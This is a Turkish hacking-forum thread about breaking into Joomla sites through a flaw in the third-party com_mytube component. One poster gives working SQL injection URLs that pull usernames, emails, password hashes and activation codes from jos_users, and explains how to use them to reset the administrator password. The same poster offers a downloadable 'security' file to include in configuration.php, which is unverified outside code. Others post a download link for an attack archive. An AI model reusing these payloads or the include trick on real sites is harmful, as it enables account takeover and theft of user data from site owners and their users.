Joomla Hacking Video İzle Hackle

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    KodlayanAdam
    KodlayanAdam's avatar
    Kayıt Tarihi: 01/Ekim/2005
    Erkek
    video da kullanılan açık kurulan 3. parti modülün açığı joomlanın değil. ayrıca administrator kullanıcı adı admin değilse bi işe yaramaz ordaki yöntem

    Hiç savaş görmemiş çocuklarla, hiç barış görüşmemiş çocuklar için adalet farklı anlamlar taşır.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

     

    resetleme kod:

    index.php?option=com_user&view=reset

     

    index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat(0x3a,username,0x3a,email,0x3a,password,0x3a,activation),13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--

    email  e gelen kodu çagırma

    index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat(0x3a,username,0x3a,email,0x3a,activation),13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--

    not hacklenmeyen diyen arkadaşa hacklediniz yerleri verdinde sussun :D


    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    joomlaya güvenlik için isteyen kardeşlerime güvenlik paketi veriyorum

     

    jomla configuration.php içine

    include("ddos.php");

    diye ekleyin

    http://rapidshare.com/files/286922104/ddos.php

    bunuda sitenin ana dizinine koyun artık ne rfi ne sql injection hiç bişeyi takmayın bu kit sizi korur


    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    coLin
    coLin's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek

    Lamer coLin iş başında :)

    http://i35.tinypic.com/20rjvba.jpg

     

  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    KodlayanAdam
    KodlayanAdam's avatar
    Kayıt Tarihi: 01/Ekim/2005
    Erkek

    arkadaşım ben hacklenmez demiyorum hacklenir ama bu joomlanın değil orada joomlaya sonradan kurulan 3. parti mytube componentinin açığıdır 

    eğer joomla kurulu sitede com_mytube yoksa yani mytube componenti kurulu değilse bu yöntemle hacleyemezsin bu bir.

     ikincisi sen 62 nolu kullanıcının parolasını sıfırlıyorsun 62 nolu kullanıcı joomla da yöneticidir. ilk kurulumda adı admin olarak gelir buraya kadar tamam

    ama yönetici admin kullanıcı adını değiştirdiyse parolayı sıfırlasanda kullanıcı adını bilmediğin için yine sisteme giremezsin.

     bir de joomlayı kuran arkadaş biraz bilincliyse ve 62 olarak gelen yonetici id sini değiştirdiyse yine sisteme giremezsin. 

    siteyi yapan lamer olunca hackleyenin hacker olmasına gerek olmuyor işin açığı.


    Hiç savaş görmemiş çocuklarla, hiç barış görüşmemiş çocuklar için adalet farklı anlamlar taşır.
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek
    kurnaazz bak konuşmuyum diyorumda konuşturuyorsun sql den admin usernamesini çagırıyorum ona göre yazıyorum zaten kullanıcı adını ben şifreyi resetliyimde sen admin değiştir ne yaparsan yap hackedsin oke oradaki sql sorgusununa bak hex ile ayrılmış x03a ile

    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    KodlayanAdam
    KodlayanAdam's avatar
    Kayıt Tarihi: 01/Ekim/2005
    Erkek

    tmm admin username i sıfırladın neye göre sql koddaki user_id=62 e göre 62 inci id admin oluyor tmm bunda sorun yoq

    ben diyorum ki adam bilinçliyse admin id sini 62 olarak bırakmaz  sende adminin idsini bilmiyorsan birşey yapamazsın

    haa com_mytube kurulu değilse zaten çalışmayacak kod.

    bunlarda anlaştık mı güzel kardeşim

    geri kalan kısmına lafım yok

    edit: zaten sende mytube eklentisi kurulu olanları aramışsın google dan


    Hiç savaş görmemiş çocuklarla, hiç barış görüşmemiş çocuklar için adalet farklı anlamlar taşır.
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    JohnD
    JohnD's avatar
    Banlanmış Üye
    Kayıt Tarihi: 19/Ekim/2008
    Erkek
    hehehhe yakışır echoll hocayaaa :)

    DOM..
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek
    turkdepo mirror : http://turkdepo.net/w6es3cbqwsh4/joomlafuck.rar.html
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mirza Efe
    _Dert_
    _Dert_'s avatar
    Kayıt Tarihi: 12/Aralık/2007
    Erkek
    Cok guzel yontem, kurnazlık gerektirir :) anladıgım kadarıyla butun sql eklentilerinde calısır. nede olsa aktivasyon kodunu diger acıklanan sql acıklarında cıkartabılırız.

Toplam Hit: 10127 Toplam Mesaj: 40